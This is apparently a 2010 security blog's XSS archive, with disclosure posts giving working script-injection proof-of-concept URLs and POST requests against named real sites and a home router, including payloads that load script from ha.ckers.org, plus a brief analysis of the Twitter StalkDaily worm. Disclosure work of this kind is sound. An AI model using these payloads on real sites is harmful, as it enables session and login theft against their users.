Showing posts with label XSS. Show all posts
Showing posts with label XSS. Show all posts

Saturday, September 11, 2010

ESPN Cricinfo Cross Site Scripting (XSS)

+++About ESPN Cricinfo+++
http://www.cricinfo.com/

+++Affected URL(s)+++
All URLs using vulnerable parameters

+++Vulnerable Parameters / Functions+++
genre
object
template
country
author
site_area
... and perhaps more!

+++PoC+++
http://www.cricinfo.com/talk/content/current/multimedia/feature.html?genre=21'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/australia/content/quote/index.html?object=2'"/><script>alert("XSS from object")</script>
http://www.cricinfo.com/australia/content/team/2.html?template=fixtures'"/><script>alert("XSS from template")</script>
http://www.cricinfo.com/australia/content/player/country.html?country=2'"/><script>alert("XSS from country")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?genre=366'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?author=29'"/><script/XSS/src=http://ha.ckers.org/xss.js>
http://www.cricinfo.com/magazine/content/current/story/magazine/alltime.html?site_area=5'"/><script/XSS/src=http://ha.ckers.org/xss.js>


ESPN Global Ist Notified:    January 2010
           IInd Notification:    September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Note: More URLs / parameters may be vulnerable.

Best Regards.

ESPN Global Cross Site Scripting (XSS)


+++About ESPN Global+++
http://espn.go.com

+++Affected URL(s)+++
http://boards.espn.go.com

+++Vulnerable Parameter / Function+++
sport
id
nav

+++PoC+++
http://boards.espn.go.com/boards/mb/mb?sport=espn'><script>alert('XSS from sport')</script>&id=index'><script>alert('XSS from id')</script>

ESPN Global Ist Notified:    January 2010
           IInd Notification:    September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Best Regards.

Sunday, June 20, 2010

Mercedes Benz Cross Site Scripting (XSS)

+++About Mercedes Benz+++
http://en.wikipedia.org/wiki/Mercedes-Benz


+++Affected URL(s)+++
http://www.mercedes-benz.com/


+++Vulnerable Parameter / Function+++
'dsc_wdw'


+++PoC+++
Home Page -> Request Brochure
vuln parameter -> @dsc_wdw


+POST Request+
https://e-services.mercedes-benz.com/Dialog_RQB/RQB;jsessionid=0000fct1dbQH_OtagtCR9h9ZhZj:14k117133?subprocess=RQBc_Cars&locale=en_IN&site_locale=en_IN


+Parameters+
dsc_lnk=sn_step2&dsc_pg=p1302&dsc_wdw='<script>alert("Mercedes.Benz Vuln to XSS")</script>&dsc_lnkapx=&historyBack=true&lastPage=p1302a&p1302.mtxCar%5B0%5D%5B0%5D=car002




Mercedes Benz Ist Notified: January 22, 2010
                                IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

MTV vulnerable to Cross Site Scripting (XSS)

+++About MTV+++
http://en.wikipedia.org/wiki/MTV


+++Affected URL(s)+++
http://www.mtv.com
http://think.mtv.com


+++Vulnerable Parameter / Function+++
'q'
'search_term'


+++PoC+++
MTV - http://www.mtv.com
http://www.mtv.com/search/?q=<script>alert('xss from search')</script>


Think.MTV - http://think.mtv.com

http://think.mtv.com/Search/TagResults.aspx?search_term=<script>alert('xss from search_term')</script>&filter_by=7&sort_order_type=1&category_ucid=44FDFFFF0002D79CFFFF00000069&time_stamp=








MTV Ist Notified: January 06, 2010
          IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

Sunday, June 13, 2010

Cognizant vulnerable to Cross-Site Scripting (XSS)

+++About Cognizant+++
We help transform core processes for greater flexibility, higher efficiency and lower costs. 
http://www.cognizant.com/html/aboutus/about-us.asp

+++Affected URL(s)+++
http://cognizant.com/html/insights/insightslandingpage.asp

-> Case Studies
-> White Papers

+++Vulnerable Parameter / Function+++
'hidPageID''

+++PoC+++

POST Request
-> Case studies
hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=casestudy&hidYear=&hidPageTitle=Case+Studies&hidNavigatingFrom=Insights&hidPageNumber=1

-> White Papers
POST http://cognizant.com/html/insights/insightslandingpage.asp
global_office=%2Fhtml%2Fhome.asp&hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=bluepaper&hidYear=&hidPageTitle=White+Papers&hidNavigatingFrom=Insights&selFilterCriteria=All+white+papers&hidPageNumber=3


Cognizant Ist Notified: February 23, 2010
                IInd Notification: March 29, 2010
Response Received: March 30, 2010
Current Status: Fixed (As of today, June 13, 2010)

Thanks to Nikhilesh Jasuja @Cognizant for his quick response on resolving this issue.

Best Regards.

Tuesday, March 23, 2010

Capgemini CTO Blog Cross-Site Scripting (XSS)


+++About Capgemini+++
A global leader in consulting, technology, outsourcing, and local professional services (http://www.capgemini.com/about/)

+++Affected URL(s)+++
http://www.capgemini.com/ctoblog/search_blog.php

+++Vulnerable Parameter / Function+++
'Search'

+++PoC+++



Capgemini Ist Notified: February 18, 2010
Capgemini IInd Notification: March 02, 2010
Response Received: March 02, 2010
Detailed Info Emailed: March 03, 2010
Current Status: Fixed (As of today, March 23, 2010)

Thanks to Richard Fahey @capgemini for his quick response on resolving this issue.

Best Regards.

Monday, March 1, 2010

TVS Star City Cross-Site Scripting (XSS)

+++About TVS Automobiles+++
A Leading automobile company with popular products as TVS Apache, Star City etc having operations in India.

+++Affected URL(s)+++
All website URLs which are using the vulnerable parameter. For example:

http://www.tvsstarcity.com/dealer-locator.asp?id=NEW%20DELHI

+++Vulnerable Parameter(s)+++
'id'

+++PoC+++



Best Regards.

Gulf Business Machines Cross-Site Scripting (XSS)

+++About GBM+++
Founded in 1990, Gulf Business Machines (GBM) is the leading IT solutions providers in the region fulfilling the IT requirements of local, regional and international organisations in the GCC.

A spin-off from IBM, GBM is the sole distributor for IBM 'excluding selected IBM products and services' throughout the GCC, except for Saudi Arabia.


+++Affected URL(s)+++
All website URLs which are using the vulnerable parameter. For example:

http://www.gbm4ibm.com/inside_networking_services.php?m=first
ttp://www.gbm4ibm.com/inside_productshowcase_cisco.php?m=fifth


and more ...

+++Vulnerable Parameter(s)+++
'm'


+++PoC+++







IBM first notified: February 18, 2010
Response: None till date
Public Disclosure: March 01, 2010


Best Regards.

Saturday, February 6, 2010

Sterlite SAM300AX ADSL router Cross Site Scripting (XSS)


Well, I reported XSS in Sterlite router on Feb 5, 2010.

Sterlite SAM300AX is used by broadband customers in Delhi and Mumbai, India. Given the customer base of MTNL in these 2 metro cities, this vulnerability may be extremely useful for an attacker and / or a bot herder looking for new bots.

After waiting for vendor response 2 weeks +, I decided to publish this to Full Disclosure/publicly.


Sharing the vuln POST request and parameters here:

POST Request
POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101
POST Parameters
Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

Screenshots
 

 

Impact
Remote script / code execution, login theft n other nasty things.
##########
Vulnerability Found: January 19, 2010 
Vendor First Notified: January 20, 2010 
Vendor Response: None 
Follow Up Notification: January 27, 2010 
Vendor Response: None 
Public Disclosure: February 05, 2010 
##########

You can read the full details here:
http://secunia.com/advisories/38463/

Sunday, April 12, 2009

Analysis: Twitter StalkDaily Worm

Twitter is again in news (surprise!, anyone). 

Another XSS worm hit Twitter creating (good, eh!) publicity of another portal -  StalkDaily. The XSS worm exploited improperly escaped profile URL field to re-display the malicious script, in this case - script src="hxxp://mikeyylolz.uuuq.com/x.js - resulting in infecting anyone who visited an infected profile.

Read more on this at: Fsecure

Strangely, that's just a small, noisy show of what XSS can do. It could have become more interesting though, using XSS to quietly infect the end-user systems & build up a botnet force. The possibilities are limitless.

Twitter seems to have rectified this issue as of now.

Until the next worm!

Safe Twitterin'  :)